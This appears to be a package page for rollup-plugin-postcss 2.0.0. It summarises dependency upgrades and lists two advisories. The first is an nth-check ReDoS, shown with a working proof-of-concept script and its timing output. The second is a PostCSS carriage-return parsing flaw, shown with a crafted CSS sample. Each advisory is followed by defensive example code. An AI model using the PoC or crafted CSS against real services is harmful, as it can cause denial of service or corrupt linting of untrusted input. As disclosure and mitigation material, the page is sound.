Rollup-plugin-postcss streamlines the integration of PostCSS into Rollup workflows, enabling developers to effortlessly process CSS files within their JavaScript bundles. Version 2.0.0 delivers notable upgrades compared to version 1.6.3. One key difference lies in the updated peer dependencies, notably requiring PostCSS version 7.0.14 or higher, a significant jump from the older 6.0.21. This ensures compatibility with newer PostCSS features and plugins. Similarly, cssnano, a CSS optimizer, is bumped from version 3.10.0 to 4.1.8, implying improved CSS minification capabilities. The newer version drops the direct dependency on fs-extra, likely streamlining internal operations and potentially reducing the bundle size.
Development dependencies also see substantial changes. Version 2.0.0 embraces modern JavaScript development by transitioning from babel-preset-env to @babel/preset-env and introduces @babel/core and rollup-plugin-babel, signifying an updated Babel configuration for transpilation. Jest is updated to v23.6.0 from v22.0.4 and Rollup to v1.1.2 from v0.57.1, bringing performance improvements and bug fixes. These updates suggest that version 2.0.0 prioritizes contemporary JavaScript standards, potentially leading to cleaner and more maintainable code. Developers upgrading should ensure their PostCSS configuration and Babel setup are compatible with the updated dependencies. The core functionality remains consistent: seamless PostCSS integration within Rollup, allowing for advanced CSS processing such as autoprefixing, module scoping, and minification as part of the bundling process.
All vulnerabilities related to version 2.0.0 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check");

for (var i = 1; i <= 50000; i++) {
    var time = Date.now();
    // "2n" followed by a growing run of spaces and a trailing "!" that forces a parse failure
    var attack_str = "2n" + " ".repeat(i * 10000) + "!";
    try {
        nthCheck.parse(attack_str);
    } catch (err) {
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
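The mitigation side of the issue above, as an added example that is not nth-check's own code: the backtracking comes from matching the an+b micro-syntax with overlapping \s* quantifiers, so a hand-written single-pass parser that consumes each character exactly once (plus a length cap, since real selectors are short) rejects the same padded input in linear time. The parser, the MAX_NTH_LEN cap and the timeReject helper are assumptions made for this illustration; the fix actually shipped in nth-check is to upgrade to a patched release.

```javascript
// Added example (not nth-check's code): linear-time parser for the
// :nth-child() "an+b" syntax, with a length cap on untrusted input.

const MAX_NTH_LEN = 64; // assumption: no legitimate nth expression is longer

// Parses "2n+1", "-n + 3", "odd", "even", "5" etc. into [a, b].
// Throws on invalid input. Every character is visited at most once,
// so cost is O(length) regardless of how the input is padded.
function parseNth(input, maxLength = MAX_NTH_LEN) {
  if (typeof input !== 'string') throw new TypeError('expected a string');
  if (input.length > maxLength) throw new Error('nth expression too long');
  const s = input.trim().toLowerCase();
  if (s === 'even') return [2, 0];
  if (s === 'odd') return [2, 1];

  let i = 0;
  const n = s.length;
  const isWs = (c) => c === ' ' || c === '\t' || c === '\n' || c === '\r' || c === '\f';
  const skipWs = () => { while (i < n && isWs(s[i])) i++; };
  const readSign = () => (i < n && (s[i] === '+' || s[i] === '-')) ? s[i++] : '';
  const readDigits = () => {
    const start = i;
    while (i < n && s[i] >= '0' && s[i] <= '9') i++;
    return s.slice(start, i);
  };

  let a, b = 0;
  const sign1 = readSign();
  const digits1 = readDigits();
  if (i < n && s[i] === 'n') {
    // "[+-]?\d*n" part, optionally followed by "[+-] \s* \d+"
    i++;
    a = digits1 === '' ? 1 : parseInt(digits1, 10);
    if (sign1 === '-') a = -a;
    skipWs();
    const sign2 = readSign();
    if (sign2 !== '') {
      skipWs();
      const digits2 = readDigits();
      if (digits2 === '') throw new Error('expected digits after sign');
      b = parseInt(digits2, 10);
      if (sign2 === '-') b = -b;
    }
  } else {
    // no "n": the whole expression must be a signed integer b
    if (digits1 === '') throw new Error('expected a number or n');
    a = 0;
    b = parseInt(digits1, 10);
    if (sign1 === '-') b = -b;
  }
  skipWs();
  if (i !== n) throw new Error('unexpected trailing input: ' + JSON.stringify(s.slice(i)));
  return [a, b];
}

// Helper for measuring rejection cost on the padded shape from the PoC.
// Returns { rejected, ms }; the cap is lifted so the scan itself is timed.
function timeReject(padding) {
  const s = '2n' + ' '.repeat(padding) + '!'; // constructed input, same shape as the PoC
  const t0 = Date.now();
  let rejected = false;
  try { parseNth(s, Infinity); } catch (e) { rejected = true; }
  return { rejected, ms: Date.now() - t0 };
}
```

With the cap in place, a padded expression is refused before any scanning happens; with the cap lifted, the scan still completes in time proportional to the length rather than to its square, which is the property a regex with overlapping quantifiers loses.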
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts will be included in the PostCSS output in CSS nodes (rules, properties) despite having originally been inside a comment.
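A pre-processing step for a linter that must feed untrusted CSS into PostCSS, as an added example that is not PostCSS's own code: upgrading to 8.4.31 or later is the fix, but the discrepancy hinges on a bare carriage return, so normalizing every line ending to "\n" before parsing removes the trigger, and counting bare CRs gives a detection signal for suspicious input. The sample string is constructed to mirror the advisory's demonstration; normalizeCss and acceptUntrustedCss are names assumed for this illustration.

```javascript
// Added example (not PostCSS's code): normalise line endings in untrusted CSS
// before handing it to a PostCSS-based linter, and report bare "\r" characters.

// Constructed sample: the advisory's demonstration rule followed by an ordinary one.
const SAMPLE_CSS = '@font-face{ font:(\r/*);}\r\n.a{color:red}';

// Returns the normalised text plus counts of "\r\n" pairs and bare "\r".
function normalizeCss(css) {
  const crlf = (css.match(/\r\n/g) || []).length;
  const bareCr = (css.match(/\r(?!\n)/g) || []).length;
  const normalized = css.replace(/\r\n?/g, '\n');
  return { css: normalized, crlf, bareCr };
}

// Policy wrapper: by default a bare "\r" in untrusted CSS is rejected rather
// than silently rewritten, since legitimate stylesheets use "\n" or "\r\n".
function acceptUntrustedCss(css, { rejectBareCr = true } = {}) {
  const result = normalizeCss(css);
  if (rejectBareCr && result.bareCr > 0) {
    return { ok: false, reason: 'bare carriage return in input', ...result };
  }
  return { ok: true, reason: null, ...result };
}
```

In lenient mode the normalised output is what reaches the parser, so the "/*" that follows the bare CR in the sample now sits on its own line and is tokenised consistently; in strict mode the input never reaches the parser at all.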